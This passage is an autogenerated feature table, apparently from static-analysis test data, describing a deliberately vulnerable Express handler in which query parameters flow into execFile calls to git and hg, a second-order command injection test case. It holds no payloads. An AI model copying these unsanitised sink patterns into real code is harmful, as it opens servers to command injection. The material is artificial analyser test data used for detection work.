indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:20:9:26 | "fetch" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:10 | indirect | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:10 | indirect | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:10 | indirect | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:10 | indirect | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:10 | indirect | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | exceptional return of indirec ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | exceptional return of indirec ... emote]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | exceptional return of indirec ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | exceptional return of indirec ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | exceptional return of indirec ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | indirec ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | indirec ... emote]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | indirec ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | indirec ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:3:11:40 | indirec ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:12:11:16 | "git" | CalleeFlexibleAccessPath | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:12:11:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:12:11:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:12:11:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:12:11:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:12:11:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:12:11:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:19:11:39 | ["ls-re ... remote] | CalleeFlexibleAccessPath | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:19:11:39 | ["ls-re ... remote] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:19:11:39 | ["ls-re ... remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:19:11:39 | ["ls-re ... remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:19:11:39 | ["ls-re ... remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:19:11:39 | ["ls-re ... remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:19:11:39 | ["ls-re ... remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:20:11:30 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:11:33:11:38 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:14 | myArgs | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:14 | myArgs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:14 | myArgs | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:14 | myArgs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:14 | myArgs | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs ... ry.args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs ... ry.args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs ... ry.args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs ... ry.args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:9:13:31 | myArgs ... ry.args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:20 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:20 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:20 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:20 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:20 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:26 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:26 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:26 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:26 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:26 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:31 | req.query.args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:31 | req.query.args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:31 | req.query.args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:31 | req.query.args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:18:13:31 | req.query.args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:22:13:26 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:22:13:26 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:22:13:26 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:22:13:26 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:22:13:26 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:28:13:31 | args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:28:13:31 | args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:28:13:31 | args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:28:13:31 | args | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:13:28:13:31 | args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | exceptional return of execFil ... myArgs) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | exceptional return of execFil ... myArgs) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | exceptional return of execFil ... myArgs) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | exceptional return of execFil ... myArgs) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | exceptional return of execFil ... myArgs) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | execFil ... myArgs) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | execFil ... myArgs) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:15:3:15:25 | execFil ... myArgs) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git 